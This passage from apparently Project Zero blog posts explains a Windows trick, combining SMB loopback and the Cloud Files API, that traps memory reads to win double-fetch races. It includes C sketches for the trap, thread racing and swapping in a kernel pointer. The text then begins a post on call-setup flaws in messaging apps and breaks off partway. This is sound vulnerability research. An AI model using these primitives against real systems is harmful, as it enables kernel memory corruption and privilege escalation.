
Hours             : 0

Minutes           : 0

Seconds           : 0

Milliseconds      : 1

...

The first access for below 512MiB takes around a second, this is because the request still needs to be made to the server and the server is written in .NET which can have a slow startup time for running new code. The second request takes significantly less than 1 second, as the memory is now cached locally and so no request needs to be made to the server.

For the accesses above 512MiB the first request takes around 10 seconds, which correlates with the added delay. The second request takes less than a second because the page is now cached locally. This is exactly what we’d expect, and proves that we can at least delay for 10 seconds. In fact you can delay the request at least 60 seconds before the connection is forcibly reset. This is based on the session timeout for the SMB client. You can query the SMB client timeout using the following command in PowerShell:

PS> (Get-SmbClientConfiguration).SessionTimeout

60

A few things to note about the SMB client’s behavior which came out of testing. First the client or the Windows cache manager seem to be able to do some caching of the remote file. If you request a specific access when opening the file, such as GENERIC_READ | GENERIC_WRITE for the desired access then caching is enabled. This means the read requests do not go to the server if they’ve previously been cached locally. However if you specify MAXIMUM_ALLOWED for the desired access the caching doesn’t seem to take place. Secondly, sometimes parts of the file will be pre-cached, such as the first and last 32KiB of the file. I’ve not worked out the cause; oddly it seems to happen more often with native code than .NET code, so perhaps it’s Windows Defender peeking at memory or perhaps Superfetch. In general as long as you keep your memory accesses somewhere in the middle of a large file you should be safe.
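Putting the client side together, a native sketch of the trap setup looks roughly like this (error handling mostly elided; the server path is a placeholder, and the MAXIMUM_ALLOWED choice reflects the caching observation above):

#include <windows.h>
#include <stdio.h>

int main(void) {
    // Open the 1GiB file on the attacker controlled SMB server. In testing,
    // asking for MAXIMUM_ALLOWED rather than GENERIC_READ | GENERIC_WRITE is
    // what kept the client from caching reads locally.
    HANDLE file = CreateFileW(L"\\\\server\\share\\file.bin", MAXIMUM_ALLOWED,
                              FILE_SHARE_READ, NULL, OPEN_EXISTING,
                              FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
        return 1;

    // Map the file; every first touch of a page becomes an SMB read which the
    // server can observe and delay.
    HANDLE section = CreateFileMappingW(file, NULL, PAGE_READONLY, 0, 0, NULL);
    unsigned char *view = (unsigned char *)MapViewOfFile(section, FILE_MAP_READ,
                                                         0, 0, 0);

    // Hand an address in the middle of the file to the vulnerable code; here
    // we just touch it ourselves to demonstrate the trap.
    printf("%02x\n", view[(size_t)512 * 1024 * 1024]);
    return 0;
}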

If you’ve run the example code you might notice a problem, running the example server locally fails with the following error:

System.Net.Sockets.SocketException (10013): An attempt was made to access a socket in a way forbidden by its access permissions.

By default Windows 10 has the SMB server enabled. This takes over the TCP ports and makes them exclusive so it’s not possible to bind to them as a normal user. It is possible to disable the local SMB server, but that would require administrator privileges. Still, it was worth verifying whether the SMB server approach will work even if we have to communicate with a remote server.

I did do some investigation into tricks I could use to get the built-in SMB server to work for our purposes. For example I tried to use the fact that you can set an Opportunistic Lock which will trap file reads. I used this trick to exploit a TOCTOU vulnerability in the LUAFV driver. Unfortunately the SMB server detects the file is already in a lock and waits for the OpLock break to occur before allowing access to the file. This made it a non-starter.

For testing you can disable the LanmanServer service and its corresponding drivers. If you wanted to use this on an arbitrary system you'd almost certainly need to connect to a remote server. I’ve released the example server code here, which can be repurposed, although it is only a demonstrator. It allows for read granularity of the native page size, which is assumed to be 4KiB. The server code should work on Linux but as of version 1.4.3 of SMBLibrary on NuGet there’s a bug which causes the server to fail when starting. There is a fix in the github repository but at the time of writing there’s no updated package.

How well does abusing the SMB client meet with our criteria from earlier? I’ve crossed out all the ones we’ve met.

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

Using the SMB client does meet the majority of our criteria. I verified that it doesn’t matter whether kernel or user mode code accesses the memory; it will still trap. The biggest problem is that it’s hard to use this from a sandboxed application, where it would perhaps be most useful. This is because MUP restricts access to remote file systems by default from restricted and low IL processes, and AppContainer sandboxes need specific capabilities which are unlikely to be granted to the majority of applications. That’s not to say it’s completely impossible, but it’d be hard to do.

While our trick doesn’t delay the memory read indefinitely, for our purposes the limit of 60 seconds based on the SMB session timeout is going to be enough for most vulnerabilities. Also, once the trap has been activated you can’t force the memory manager to request the same page from the server again. I tried playing with memory caching flags and direct IO, but at least for files over SMB nothing seemed to work. However, you can specify your own base address when mapping a file, so you could map different offsets in the file to the same virtual address by unmapping the original and mapping in a new copy. This would allow you to use the same address multiple times.
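A sketch of that remapping idea, assuming 'section' is the section handle for the remote file and the offset is a multiple of the 64KiB allocation granularity:

#include <windows.h>

/* Map 'length' bytes at 'file_offset' from the section at a fixed virtual
   address, replacing whatever view was there before. Error handling is
   elided; the first call can pass base == NULL to pick an address. */
void* remap_at(HANDLE section, void* base, ULONGLONG file_offset, SIZE_T length) {
    if (base != NULL)
        UnmapViewOfFile(base);                 /* release the previous view */
    return MapViewOfFileEx(section, FILE_MAP_READ,
                           (DWORD)(file_offset >> 32),
                           (DWORD)(file_offset & 0xFFFFFFFF),
                           length,
                           base);              /* ask for the same base again */
}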

WebDAV

As SMB can’t be easily used locally, what about WebDAV? By default TCP port 80 is unused on Windows 10 so we can start our own web server to communicate with. Also unlike on Linux there’s no requirement for having administrator privileges to bind to TCP ports under 1024. Even if either of these were not the case the WebDAV client supports a syntax to specify the TCP port of the server. For example if you use the path \\localhost@8080\share then the WebDAV HTTP connection will be made over port 8080.

However, does the WebDAV client expose the right read and write primitives to allow us to trap on memory access? I wrote a simple WebDAV server using the NWebDav library to serve local files. Running the script, but specifying the WebDAV server on port 8080 to open the 1GiB file, I’m immediately faced with a problem:

Get-NtFile : (0xC0000904) - The file size exceeds the limit allowed and cannot be saved.

Just opening the file fails with the error code STATUS_FILE_TOO_LARGE. The reason for that can be found in one of many Microsoft Knowledge Base articles such as this one. There’s a default limit of 50MB (that’s decimal megabytes) for any file accessed on a WebDAV share because it used to be possible to cause a denial of service by tricking a Windows system into downloading an arbitrarily large file.

The reason this size-limiting behavior exists is also why WebDAV isn’t suitable for our attack. If you resize the file to below 50MB you’ll find the WebDAV client pulls the file in its entirety to the local disk before returning from the file open call. That file is then mapped into memory as a local file. The WebDAV server never synchronously receives a GET or PUT request for reads or writes to the memory mapping, so there’s no mechanism to detect or trap specific memory requests.

File System Overlay APIs

Abusing the SMB client does work, but it can’t be used locally on a default installation. I decided I needed to look for another approach. As I was looking at Windows Filter Drivers (see the last blog post) I noticed a few of the drivers provide a mechanism to overlay another file system on top of an existing one. I trawled through MSDN to find the API documentation and see if anything would be suitable. The three I looked at are shown in the table below.

File system                Supported Version    Default?
Projected File System      Windows 10 1809      No
Windows Overlay (WOF)      Everything           Yes
Cloud Files API            Windows 10 1709      Yes (except non-Desktop Server SKUs)

By far the most interesting one is the Projected File System. This was developed by Microsoft to provide a virtual file system for Git. It allows placeholder files to be “projected” into a directory on disk, and the contents of those files are only “rehydrated” to a full file on demand. In theory this sounds ideal: as long as it populates the file’s contents piecemeal, we could add delays when servicing the PRJ_GET_FILE_DATA_CB callback.

However, a basic implementation based on Microsoft’s ProjectedFileSystem sample code would always rehydrate the entire file during file open, similar to WebDAV. Perhaps there’s an option I missed to stream the contents rather than populate them in one go, but I couldn’t find it immediately. In any case the Projected File System is not installed by default, making it less useful.

WOF doesn’t really allow you to implement your own file system semantics. Instead it allows you to overlay files from either a secondary Windows Image File (WIM) or compressed files on the same volume. This really doesn’t give us the control we’re looking for; you might be able to finagle something to work, but it seems like a lot of effort.

That leaves us with the Cloud Files API. This is used by OneDrive to provide the local online filesystem, but it is documented and can be used to implement any file system overlay you like. It works very similarly to the Projected File System, with placeholders for files and the concept of hydrating the file on demand. The contents of the files do not need to come from any online service such as OneDrive; they can all be sourced locally. Crucially, basic testing showed it supports streaming the contents of the file based on what is being read: you can delay the file data requests and the reading thread will block until the read has been satisfied. This can be enabled by specifying the CF_HYDRATION_POLICY_PRIMARY hydration policy with the value CF_HYDRATION_POLICY_PARTIAL when configuring the base sync root, which allows the Cloud Files API to hydrate only the parts of the file which are accessed.
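As a sketch, configuring the sync root for partial hydration looks something like this (the provider name and sync root path are placeholders, and you need to link against CldApi.lib):

#include <windows.h>
#include <cfapi.h>

HRESULT register_partial_sync_root(void) {
    CF_SYNC_REGISTRATION reg = { 0 };
    reg.StructSize = sizeof(reg);
    reg.ProviderName = L"TrapProvider";     /* arbitrary names for the demo */
    reg.ProviderVersion = L"1.0";

    CF_SYNC_POLICIES policies = { 0 };
    policies.StructSize = sizeof(policies);
    /* Partial hydration: only the ranges of the file actually read are
       requested from the provider, instead of the whole file up front. */
    policies.Hydration.Primary = CF_HYDRATION_POLICY_PARTIAL;
    policies.Population.Primary = CF_POPULATION_POLICY_ALWAYS_FULL;

    return CfRegisterSyncRoot(L"C:\\SyncRoot", &reg, &policies,
                              CF_REGISTER_FLAG_NONE);
}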

This seemed perfect, until I tested it with the PowerShell file mapping script and it didn’t work: my cloud file provider was always asked to provide the entire file. Checking the Cloud Filter driver, when a request is received for mapping a placeholder file, the IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION handler always fully rehydrates the file before completing. If the file is not fully hydrated then the call to NtCreateSection never returns, which prevents the file being mapped into memory.

I was going to go back to my filter research until I realized I might be able to combine the SMB client loopback with the Cloud Files API. I already knew that the SMB client doesn’t really map a file, even locally; instead it reads it on demand via the SMB protocol. And I also knew that the Cloud Files API allows streaming parts of the file on demand as long as the file isn’t being mapped into memory. The final setup is shown in the following diagram:

Overview of the operation of the exploitation trick. Memory is read by the application from a mapped file, which causes a page fault. That then requests the contents of the file to be pulled over SMB which goes to the local Cloud Filter Driver and back to the original application where the read is handled.

To use the primitive we first set up our own cloud provider by registering the sync root directory using the CfRegisterSyncRoot API, configuring it with the partial hydration policy. Then a 1GiB placeholder can be created in the directory using CfCreatePlaceholders. At this point the file does not have any contents on disk. If we now open and map the placeholder file via the SMB loopback client, the file will not be rehydrated immediately.
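Creating the placeholder might look like the following sketch (the file name, identity blob and size are illustrative):

#include <windows.h>
#include <cfapi.h>

/* Create a single 1GiB placeholder inside the registered sync root. The
   file has no data on disk until the provider hydrates it. */
HRESULT create_placeholder(void) {
    static const WCHAR identity[] = L"trap";   /* opaque provider-defined blob */
    CF_PLACEHOLDER_CREATE_INFO info = { 0 };
    info.RelativeFileName = L"trap.bin";
    info.FsMetadata.FileSize.QuadPart = 1024LL * 1024 * 1024;   /* 1GiB */
    info.FsMetadata.BasicInfo.FileAttributes = FILE_ATTRIBUTE_NORMAL;
    info.FileIdentity = identity;
    info.FileIdentityLength = sizeof(identity);
    info.Flags = CF_PLACEHOLDER_CREATE_FLAG_MARK_IN_SYNC;

    DWORD processed = 0;
    return CfCreatePlaceholders(L"C:\\SyncRoot", &info, 1,
                                CF_CREATE_FLAG_NONE, &processed);
}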

Any memory access into the mapping will cause the SMB client to make a request for a 32KiB block, which will be passed to our user-mode cloud provider, where we can detect and delay it as necessary. It goes without saying that the contents of the file can also be arbitrary. Based on testing it doesn’t seem like you can force the read granularity down to the native page size as you can when implementing a custom SMB server; however, you can still make requests at native page size boundaries within the larger granularity. It might be possible to modify the file size to trick the SMB server into doing short reads, but this behavior has not been tested. A sample implementation of the cloud provider is available here.

Usage Examples

We now have an exploitation trick which allows us to trap and delay virtual memory reads and writes. The big question is: does this improve the exploitation of vulnerabilities such as double fetches? The answer depends on the actual vulnerability. A quick note: when I use the word page I mean the unit of memory which will cause a request to the SMB server, e.g. 32KiB, not the native page size such as 4KiB.

Let’s take the example given at the start of this blog post. This vulnerability reads the value from the same memory address, lpInputPtr, twice: first for the comparison, then for the size to copy. The problem for exploitation is one of the limitations of the technique: the memory trap is one shot. Once the trap has fired to read the size for the comparison you can delay it indefinitely. However, once you provide the requested memory page and the faulting thread is resumed it won’t fire on the second read; the value will just be read from memory as if it was always there.

You might wonder if you could remap the memory page when you detect the first read? Unfortunately this doesn’t work. When the thread is resumed it restarts at the faulting instruction and will perform the read again, therefore what would happen is the following:

Directed graph showing the states of the double fetch: ① Read Size from Pointer -> ② Page Fault -> ③ Remap Page -> ④ Resume Thread -> back to ①

As you can tell from the diagram you end up trapped in an infinite loop, as you remap a fresh page which just triggers another page fault ad infinitum. If you don’t perform step ③ then the operation will complete and there is a time window between resuming the thread, reading the now valid memory for the size comparison and the second read. However, in this example the time window is likely to be the order of a couple of instructions so using our exploitation trick isn’t better than the existing probabilistic approaches. That said one advantage is you do know when the read occurs which allows you to target the brute force window more accurately.

This example is the worst case; what if there was more time between the reads? Another example from the Bochspwn paper is shown below:

PDWORD BufferSize = // controlled user-mode address
PUCHAR BufferPtr  = // controlled user-mode address
PUCHAR LocalBuffer;

LocalBuffer = ExAllocatePool(PagedPool, *BufferSize);①
if (LocalBuffer != NULL) {
  RtlCopyMemory(LocalBuffer, BufferPtr, *BufferSize);②
} else {
  // bail out
}

The same double fetch behavior is present; however, what’s different is that the value is passed to another function, in this case ExAllocatePool, which allocates kernel memory. Depending on the current memory configuration or how large the requested allocation is, there might be a significant time delay between ① and ②. Is there any way we can win the race?

Well, not that I know of, at least not deterministically. But we can exploit one behavior to try to synchronize the reading and writing threads a little. Recall that in order to write to an unresolved page the contents of the page must first be read from the server. Therefore, to maintain consistency, any thread writing to the unresolved page must generate a page fault and wait on the same lock as a thread which is just reading from the page, as shown in the following diagram:

Diagram showing separate read and write threads accessing the same pointer, one for read and one for write. When the page fault occurs both threads enter the same lock and they are both resumed once the lock is released.

By synchronizing the reading and writing threads you’re giving yourself a reasonable chance of causing a write to happen during the time window for exploitation. This is still a probabilistic approach; it depends on the scheduler. For example, it’s possible that the write thread is woken before the read thread, which will cause the pointer to always take the final value. Or the read thread could run to completion before the write thread is ever scheduled, making the value never change. It’s possible there’s some scheduler magic, such as using multiple reader or writer threads or selecting appropriate priorities, which you could exploit to guarantee read and write ordering. I’d be surprised if anything is reliable across multiple Windows 10 systems. I’d be very interested in anyone who’s got better ideas on how to improve the reliability of this.
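A minimal sketch of the synchronization, assuming 'trapped_size_ptr' points into the unresolved page:

#include <windows.h>

static volatile DWORD* shared_size;   /* points into the trapped page */

static DWORD WINAPI reader(LPVOID arg) {
    /* Stand-in for the thread entering the vulnerable code path: the
       first fetch faults and blocks until the page is resolved. */
    return *shared_size;
}

static DWORD WINAPI writer(LPVOID arg) {
    /* A write also needs the page contents first, so it faults on the
       same page and waits on the same lock. Both threads resume together
       once we satisfy the read, racing the write against the second fetch. */
    *shared_size = 0x1000;
    return 0;
}

void race(volatile DWORD* trapped_size_ptr) {
    HANDLE threads[2];
    shared_size = trapped_size_ptr;
    threads[0] = CreateThread(NULL, 0, reader, NULL, 0, NULL);
    threads[1] = CreateThread(NULL, 0, writer, NULL, 0, NULL);
    WaitForMultipleObjects(2, threads, TRUE, INFINITE);
    CloseHandle(threads[0]);
    CloseHandle(threads[1]);
}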

One approach you might be wondering about is unaligned access, say splitting the value across two separate pages. From a microarchitectural perspective it’s likely that the read will be split into two parts, first touching one page then the other. However, remember how the page fault works: it generates an exception which causes a handler to execute in the kernel. Any work the instruction has already done will be discarded while the kernel deals with the page fault. When the thread is resumed it will restart the faulting instruction, which will reissue the appropriate micro-operations to read from the unaligned address. Unless the compiler generated two loads for the unaligned access (which might happen on some architectures) there is no way I know of to restart the memory access instruction part of the way through.

This all seems slightly downbeat on the usefulness of the exploitation trick. Thing is, there are as many different types of vulnerability as there are fish in the sea (if you’re reading this in 2100, I apologize for the acidification of the seas which killed all marine life; choose your own apocalypse-appropriate proverb instead). For example, if we modify the original example as follows:

PDWORD lpInputPtr = // controlled user-mode address
UCHAR  LocalBuffer[256];

if (lpInputPtr[0] > sizeof(LocalBuffer) || lpInputPtr[1] != 2) {
  return STATUS_INVALID_PARAMETER;
}
RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr);

The check now ensures the copy length is no larger than the buffer and that a second DWORD in the buffer is set to 2. The second field might represent the buffer type, with type 2 being the only one valid for this request. If you check the compiler output for this code, such as on Godbolt, the difference in native code is 2 or 3 instructions. This would seem to not materially improve the odds of winning the TOCTOU race when using a naïve probabilistic approach. But with our exploitation trick we can now build a deterministic exploit.

Diagram showing access memory for the two reads which can generate a page fault which can allow us to modify the original size value. The central part of the diagram shows a previous page which only contains the Size field and the next page which contains the Type field and the rest of the structure.

The diagram above shows how we can achieve this deterministic exploit. We can place the Size field on a different page to the rest of the input buffer, although the buffer is still contiguous in virtual memory. The first page (N-1) should already be faulted into memory and contain the Size field which is smaller than the LocalBuffer size. We can let the read for the size ① complete normally.

Next the code will read the Type field which is on page N ②. This page isn’t currently in memory and so when it’s accessed a page fault will occur ③. This requires the kernel to read the contents from the file, which we can detect and delay. When the read is detected we have as long as we need to modify the Size field to contain a value larger than the LocalBuffer size ④. Finally we complete the read, which will restart the thread back at the Type field read instruction ⑤. The code can continue and will now read the overly large Size field and cause memory corruption.
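Putting that layout into code, a sketch might look like this (the page offsets are illustrative, and it assumes the view is mapped copy-on-write so the Size update stays local):

#include <windows.h>

#define SMB_READ_GRANULARITY (32 * 1024)   /* observed 32KiB request size */

/* Place the input so Size is the last DWORD of page N-1 and the Type
   field starts page N ("page" here meaning the 32KiB SMB unit). Assumes
   the file data already contains Size = 16 at that offset. */
DWORD* place_input(unsigned char* view) {
    unsigned char* page_n = view + 4 * SMB_READ_GRANULARITY; /* any later page */
    DWORD* input = (DWORD*)(page_n - sizeof(DWORD));

    volatile DWORD warm = input[0];   /* fault page N-1 in ahead of time */
    (void)warm;
    return input;   /* hand to the vulnerable call on another thread */
}

/* Called when our provider sees the hydration request for page N (step ③). */
void on_page_n_trap(DWORD* input) {
    input[0] = 0x1000;   /* step ④: Size now exceeds LocalBuffer */
    /* ...then complete the hydration request to resume the blocked thread,
       which restarts at the Type read (step ⑤) and then copies with the
       oversized Size, corrupting memory. */
}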

The key takeaway is that if between the double fetch points the code touches any user mode memory under your control which is not the one being double fetched it should be possible to convert that into a deterministic exploit. It doesn’t matter if the target system only has a single CPU, what the scheduling algorithm is in the kernel, how many instructions are between the double fetch points or what day of the week it is etc, it should “just work”.

The follow-up blog post on double-fetch exploitation gives some figures for exploitability. For the examples shown up to now, when the right timing window is chosen, the chance of success can hit 100% after some number of seconds of brute forcing. As shown here we can also get 100% reliability on some classes of the same bug, but in the best case this isn’t an improvement beyond being deterministic.

All the examples up to now only demonstrate the exploitation of what the blog post refers to as arithmetic races. The blog also mentions a second class of bug, binary races, which are harder to exploit and never reach 100% success. Let’s look at the example in the blog and see if our exploitation trick does better.

PVOID* UserPointer = // controlled user-mode address
__try {
   ProbeForWrite(*UserPointer, sizeof(STRUCTURE), 1);①
   RtlCopyMemory(*UserPointer, LocalPointer, sizeof(STRUCTURE));②
} __except {
   return GetExceptionCode();
}

On the face of it this doesn’t look massively different to the previous examples; however, in this case the destination pointer is being changed rather than the size. The ProbeForWrite kernel API checks that the pointer is at a user-mode address and that the memory is writable. This is a commonly used idiom to verify a user-supplied pointer is not pointing into kernel memory.

If the pointer value is changed between ① and ② from a user mode address to a kernel mode address the example would overwrite kernel memory. The behavior is harder to exploit with a probabilistic exploit as there are only two valid values of the pointer, either a user-mode address or a kernel mode address. If you’re brute forcing the pointer value then it’s possible to end up where both fetches read a user-mode pointer even though it might change to a kernel pointer in between the fetches.

Fortunately, due to the call to ProbeForWrite this is trivial to exploit if you can trap on user memory access as shown in the following diagram:

Diagram showing access to the UserPointer which is then passed to ProbeForWrite. We can generate a page fault when probing the buffer which can allow us to modify the original pointer.

From the diagram, the first read from UserPointer is made ① and the resulting pointer value passed to ProbeForWrite. The ProbeForWrite API first checks that the pointer is in the user-mode address space, then probes each page of memory up to the size of the length parameter ②. If a page is invalid or not writable then an exception will be generated and caught by the example's __except block. This gives us our exploit opportunity: we can use the exploitation trick on one of the user-mode pages being probed, which will cause ProbeForWrite to generate a page fault we can trap ③. However, as the address being probed is not the same as the one storing the pointer, we can modify the pointer to contain a kernel-mode address while the request is trapped ④. The result is we can deterministically win the race.
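A sketch of that setup, with an illustrative kernel address standing in for the real target:

#include <windows.h>

/* The location the kernel double-fetches. 'trapped' must point at a
   placeholder-backed page; this buffer itself stays on ordinary memory. */
static PVOID* user_pointer;

void setup(void* trapped) {
    user_pointer = VirtualAlloc(NULL, sizeof(PVOID),
                                MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    /* First fetch reads a user-mode address, so ProbeForWrite passes its
       address check and then probes the buffer itself... */
    *user_pointer = trapped;
}

/* Called when our provider sees the probe fault on the trapped page. */
void on_probe_trap(void) {
    /* ...which blocks the kernel thread. While it is blocked we swap in a
       kernel address; the second fetch then copies to kernel memory. */
    *user_pointer = (PVOID)0xFFFFF78000000000;  /* illustrative kernel address */
}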

Of course I’ve been focussing on kernel double fetches as it’s what originally drew me to look for this behavior. There are many scenarios where this can be used to aid exploitation of user-mode applications. The most obvious one is where a service is sharing memory with a lower privileged application. An example of this sort of issue was a double-fetch in the DfMarshal COM marshaler. The COM marshaler shared a memory section between processes so it was possible to provide a section which exploited our trick. In the end this trick wasn’t necessary as the logic of the vulnerable code allowed me to create an infinite loop to extend the double fetch window. However if that didn't exist we could use this trick to detect and delay when the code was at the point where the handle could be switched.

Another more subtle use is where a privileged process reads memory from a less privileged process. This might be explicit use of APIs such as ReadProcessMemory or it could be indirect, for example querying for the process’ command line using NtQueryInformationProcess will read out memory locations under our control.
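As a sketch of how you might point such an indirect read at a trapped page, using only the PEB fields winternl.h exposes (the length handling is illustrative):

#include <windows.h>
#include <winternl.h>

/* Point our own command-line buffer at a trapped page so a privileged
   process reading it (e.g. via NtQueryInformationProcess) blocks on our
   trap when it dereferences the buffer. */
void retarget_command_line(WCHAR* trapped_page, USHORT byte_length) {
    PEB* peb = NtCurrentTeb()->ProcessEnvironmentBlock;
    RTL_USER_PROCESS_PARAMETERS* params = peb->ProcessParameters;
    params->CommandLine.Buffer = trapped_page;
    params->CommandLine.Length = byte_length;
    params->CommandLine.MaximumLength = byte_length;
}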

The thing to remember with this exploitation trick is it can be used to open up the window to win a timing race. In this case it’s similar to my previous work on oplocks, but instead for memory access. In fact the access to memory might be incidental to the vulnerable code, it doesn’t have to be a memory double fetch or necessarily even a TOCTOU vulnerability. For example you might be trying to win a race between two file paths with symbolic links. As long as the vulnerable code can be made to probe a user mode address we control then you can use it as a timing signal and to widen the exploitation window.

Conclusions

I’ve described an exploitation trick combining SMB and the Cloud Files API which can aid in demonstrating exploitation of certain types of application and kernel vulnerabilities. It’s possible that there are other ways of achieving a similar result with APIs I haven’t looked at, but for now this is the best approach I’ve come up with. It allows you to trap on reads from user-mode memory, detect when the access occurs and delay the read for at least 60 seconds. Examples of code to implement the SMB and Cloud Files API tricks are available here.

It’s worth just reiterating some more of the limitations of this exploitation trick before we conclude.

  • Can’t be used in a sandbox, only from a normal user privilege.
  • Only allows a one shot for any page mapped from the file. If something else (such as AV) tries to read that page or from the file then the trap may fire early.
  • Can’t detect the exact location of a read; the granularity is 4KiB at best. For local access via the Cloud Files API a request always populates a 32KiB block, i.e. the accessed page plus the following seven native pages. If accessing a custom SMB server the read size can be reduced to 4KiB. This would prevent exploitation of certain bugs which require precise trapping on a small area within a larger structure.
  • Can only detect writes indirectly, can’t specifically trap on a write.

From a practical perspective the trick presented here doesn’t significantly improve the win rates for the traditional kernel double fetches outlined in the Bochspwn paper. Realistically, for most of those classes of vulnerability you’d probably want to use a probabilistic approach, if anything due to its simplicity of implementation. However, the trick is applicable to other bug classes where the memory trap is used as a deterministic timing signal alongside the vulnerability.

The one-shot nature of the trick also makes it of no real benefit for exploiting simple double-fetch code paths. More complex code might also read and write a memory address more than once before reaching the vulnerable code, which can make managing traps more difficult.

The State of State Machines

19 January 2021 at 17:28

Posted by Natalie Silvanovich, Project Zero

On January 29, 2019, a serious vulnerability was discovered in Group FaceTime which allowed an attacker to call a target and force the call to connect without user interaction from the target, allowing the attacker to listen to the target’s surroundings without their knowledge or consent. The bug was remarkable in both its impact and mechanism. The ability to force a target device to transmit audio to an attacker device without gaining code execution was an unusual and possibly unprecedented impact of a vulnerability. Moreover, the vulnerability was a logic bug in the FaceTime calling state machine that could be exercised using only the user interface of the device. While this bug was soon fixed, the fact that such a serious and easy to reach vulnerability had occurred due to a logic bug in a calling state machine -- an attack scenario I had never seen considered on any platform -- made me wonder whether other state machines had similar vulnerabilities as well. This post describes my investigation into calling state machines of a number of messaging platforms, including Signal, JioChat, Mocha, Google Duo, and Facebook Messenger.

WebRTC and State Machines

The majority of video conferencing applications are implemented using WebRTC, which I’ve discussed in several past blog posts. WebRTC connections are created by exchanging call set-up information in the Session Description Protocol (SDP) between peers, a process which is called signalling. Signalling is not implemented by WebRTC, which allows peers to exchange SDP over whatever secure communication channel is available to them, usually WebSockets for web applications and secure messaging for messaging applications.

There are a few types of SDP that can be exchanged by WebRTC peers. In a typical connection, the caller starts off by sending an SDP offer, and then the callee responds with an SDP answer. These messages contain most information that is needed to transmit and receive media, including codec support, encryption keys and much more. After the offer/answer exchange, peers can send SDP candidates to other peers. Candidates are potential network paths that the two peers can use to connect to each other, and SDP candidates contain information such as IP addresses and TURN servers. Peers usually send more than one candidate to a peer, and candidates can be sent at any time during a connection.

WebRTC connections maintain an internal state related to whether an offer or answer has been received and processed, however, applications that use WebRTC usually have to maintain their own state machine to manage the user state of the application. How the user state maps to the WebRTC state is a design choice made by the WebRTC integrator, which has both security and performance consequences. For example, some applications do not exchange any SDP until the callee user has interacted with the application to answer the call, meanwhile others set up the peer-to-peer connection, and start sending audio and video from caller to callee before the callee is even notified of the call.

Regardless of design, transmitting audio or video from an input device must be directly enabled by application code using WebRTC. This is usually done using a feature called tracks. Every input device is considered a ‘track’, and each specific track must be added to a specific peer connection by calling addTrack (or language equivalent) before audio or video is transmitted. Tracks can also be disabled, which is useful for implementing mute and camera-off features. Each track also has an RTPSender property that can be used to fine-tune the properties of transmission, which can also be used to disable audio or video transmission.

Theoretically, ensuring callee consent before audio or video transmission should be a fairly simple matter of waiting until the user accepts the call before adding any tracks to the peer connection. However, when I looked at real applications they enabled transmission in many different ways. Most of these led to vulnerabilities that allowed calls to be connected without interaction from the callee.
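To illustrate the recommended ordering, here is a hypothetical pseudo-C sketch; the types and the add_track helper are stand-ins for whatever WebRTC binding an application uses, not a real API:

typedef struct PeerConnection PeerConnection;
typedef struct MediaTrack MediaTrack;

typedef struct {
    PeerConnection* pc;
    MediaTrack* mic;
    MediaTrack* camera;
} Call;

/* Stand-in for the platform binding's addTrack; stubbed because this
   sketch only shows the ordering, not a real WebRTC call. */
static void add_track(PeerConnection* pc, MediaTrack* track) {
    (void)pc; (void)track;
}

/* Safe ordering: SDP and candidates may be exchanged earlier for
   performance, but no input device is attached to the peer connection
   until the callee explicitly accepts via the user interface. */
void on_answer_button_pressed(Call* call) {
    add_track(call->pc, call->mic);
    add_track(call->pc, call->camera);
}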

Signal Messenger

I looked at Signal in September 2019, and at that time, the application had a calling setup that is very similar to what is recommended in WebRTC documentation.

A peer-to-peer connection is established, and then the callee's audio track is added to the connection when the callee accepts the call by interacting with the user interface. Then a message is sent to the caller via the peer-to-peer connection, telling it to also move to the connected state and add the track.

Unfortunately, the application didn’t check that the device receiving the connect message was the caller device, so it was possible to send a connect message from the caller device to the callee. This caused the audio call to connect, allowing the caller to hear the callee’s surroundings. I tested this bug by changing Signal’s open-source code to send the message and recompiling the attacking client.

This vulnerability was fixed in the client in September 2019, and since then, Signal’s signalling code has been replaced by the ringrtc project, which uses a more conservative state machine.

This bug was purely in Signal’s code, and was not due to a misunderstanding of WebRTC functionality. The state machine design was largely effective in requiring user consent to transmit audio, but a specific check was not implemented.

JioChat and Mocha

I accidentally found two very similar vulnerabilities in JioChat and Mocha messengers in July 2020 while testing whether a WebRTC exploit would work on them. They both had a similar signalling design, which was server-mediated.

The offer and answer are exchanged via the server, and then both the caller and the callee send their candidates to the server. The server then stores them until the callee interacts with their device and accepts the call. Then the peer-to-peer connection is created, and when WebRTC enters into its internal connected state, the track is added, causing audio and video to be transmitted.

This design has a fundamental problem, as candidates can be optionally included in an SDP offer or answer. In that case, the peer-to-peer connection will start immediately, as the only thing preventing the connection in this design is the lack of candidates, which will in turn lead to transmission from input devices. I tested this by using Frida to add candidates to the offers created by each of these applications. I was able to cause JioChat to send audio without user consent, and Mocha to send audio and video. Both of these vulnerabilities were fixed soon after they were filed by filtering SDP on the server.

These issues were caused by a misunderstanding of how WebRTC works coupled with an attempt to improve WebRTC performance with an unusual signalling design. Normally, WebRTC integrators have to decide whether to wait until the callee has answered the call to set up the peer-to-peer connection. Setting the connection up early improves performance and prevents the user from having to wait when they answer a call, but also greatly increases the remote attack surface of WebRTC. These applications tried to improve performance without the security cost with this design, but didn’t consider all the ways that WebRTC can start a peer-to-peer connection.

It is generally not a good idea for integrators to gate audio or video transmission on any WebRTC feature that is not adding or enabling tracks. To start, many WebRTC features are complex, so it is easy to make a mistake that allows audio or video to be transmitted. Also, if the feature that is gated on is not commonly-used or not a security feature, it could be poorly tested or changed in the future.

Duo

I looked at Google Duo in September 2020. Duo’s signalling methodology is somewhat different from a lot of messengers because it supports a feature that allows the callee to preview the caller’s video before answering. So a one-way video stream needs to be set up before the call is answered.

The image above shows the setup of the one-way video stream. Dotted lines represent asynchronous calls made using Java executors. The lack of transmission from callee to caller is enforced by two methods. First, the SDP offer contains the property a=sendonly for video, which causes video to only be transmitted in one direction. Also, when the callee receives the offer from the caller, it adds the video track to the peer connection, but then disables it using the RTPSender property of the track (the audio track is not added or enabled until the user accepts the call).

